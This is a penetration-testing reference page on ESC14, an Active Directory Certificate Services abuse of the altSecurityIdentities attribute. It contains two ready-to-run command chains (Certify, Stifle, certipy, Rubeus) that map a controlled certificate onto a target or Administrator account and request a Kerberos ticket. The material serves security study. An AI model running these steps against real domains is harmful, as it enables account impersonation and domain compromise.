ad-adcs-esc14.md (4490B)
1 --- 2 title: "Active Directory - Certificate ESC14" 3 section: "Active Directory" 4 sectionSlug: "active-directory" 5 sourcePath: "docs/active-directory/ad-adcs-esc14.md" 6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/ad-adcs-esc14.md" 7 sha: "203bb0c0b290" 8 isIndex: false 9 --- 10 11 # Active Directory - Certificate ESC14 12 13 ## ESC14 - altSecurityIdentities 14 15 > ESC14 is an Active Directory Certificate Services (ADCS) abuse technique that leverages the altSecurityIdentities attribute to perform explicit certificate mappings. This attribute allows administrators to associate specific certificates with user or computer accounts for authentication purposes. However, if an attacker gains write access to this attribute, they can add a mapping to a certificate they control, effectively impersonating the targeted account. 16 17 Domain administrators can manually associate certificates with a user in Active Directory by configuring the altSecurityIdentities attribute of the user object. This attribute supports six different values, categorized into three weak (insecure) mappings and three strong mappings. 18 19 In general, a mapping is considered strong if it relies on unique, non-reusable identifiers. Conversely, mappings based on usernames or email addresses are classified as weak, as these identifiers can be easily reused or changed. 20 21 | Mapping | Example | Type | Remarks | 22 | ---------------------- | ---------------------------------- | ------ | ------------- | 23 | X509IssuerSubject | `X509:<I>IssuerName<S>SubjectName` | Weak | / | 24 | X509SubjectOnly | `X509:<S>SubjectName` | Weak | / | 25 | X509RFC822 | `X509:<RFC822>user@contoso.com` | Weak | Email Address | 26 | X509IssuerSerialNumber | `X509:<I>IssuerName<SR>1234567890` | Strong | Recommended | 27 | X509SKI | `X509:<SKI>123456789abcdef` | Strong | / | 28 | X509SHA1PublicKey | `X509:<SHA1-PUKEY>123456789abcdef` | Strong | / | 29 30 **Requirements**: 31 32 * Ability to modify the attribute `altSecurityIdentitites` of an account. 33 34 **Exploitation**: 35 36 **Technique 1** with [GhostPack/Certify](https://github.com/GhostPack/Certify) and [logangoins/Stifle](https://github.com/logangoins/Stifle) 37 38 ```ps1 39 # the certificate requested must be a machine account certificate 40 Certify.exe request /ca:lab.lan\lab-dc01-ca /template:Machine /machine 41 42 # convert to base64 .pfx format: 43 openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export | base64 -w 0 44 45 # generate a certificate mapping string and write it to the target objects altSecurityIdentities attribute: 46 Stifle.exe add /object:target /certificate:MIIMrQI... /password:P@ssw0rd 47 48 # request a TGT using PKINIT authentication, effectively impersonating the target user with Rubeus: 49 Rubeus.exe asktgt /user:target /certificate:MIIMrQI... /password:P@ssw0rd 50 ``` 51 52 **Technique 2** using [Deloitte-OffSecResearch/Certipy](https://github.com/Deloitte-OffSecResearch/Certipy) and [JonasBK/Add-AltSecIDMapping.ps1](https://github.com/JonasBK/Powershell/blob/master/Add-AltSecIDMapping.ps1) 53 54 ```ps1 55 # request a machine account certificate 56 addcomputer.py -method LDAPS -computer-name 'ESC13$' -computer-pass 'P@ssw0rd' -dc-host dc.lab.local 'lab.local/kuma' 57 certipy req -target dc.lab.local -dc-ip 10.10.10.10 -u "ESC13$@lab.local" -p 'P@ssw0rd' -template Machine -ca LAB-CA 58 59 # extract Serial Number and Issuer, to configure a strong mapping 60 certutil -Dump -v .\esc13.pfx 61 Get-X509IssuerSerialNumberFormat -SerialNumber "<serial-number>" -IssuerDistinguishedName "<issuer-cn>" 62 63 # add mapping to the Administrator user 64 Add-AltSecIDMapping -DistinguishedName "CN=Administrator,CN=Users,DC=lab,DC=local" -MappingString "<output-x509-issuer-serial-number>" 65 66 # request TGT for Administrator 67 Rubeus.exe asktgt /user:Administrator /certificate:esc13.pfx /domain:lab.local /dc:dc.lab.local /show /nowrap 68 ``` 69 70 ## References 71 72 * [ADCS ESC14 Abuse Technique - Jonas Bülow Knudsen - February 28, 2024](https://posts.specterops.io/adcs-esc14-abuse-technique-333a004dc2b9) 73 * [Exploitation de l’AD CS : ESC12, ESC13 et ESC14 - Guillon Bony Rémi - February, 2025](https://connect.ed-diamond.com/misc/mischs-031/exploitation-de-l-ad-cs-esc12-esc13-et-esc14) 74 * [GOAD - part 14 - ADCS 5/7/9/10/11/13/14/15 - Mayfly - March 10, 2025](https://mayfly277.github.io/posts/ADCS-part14/)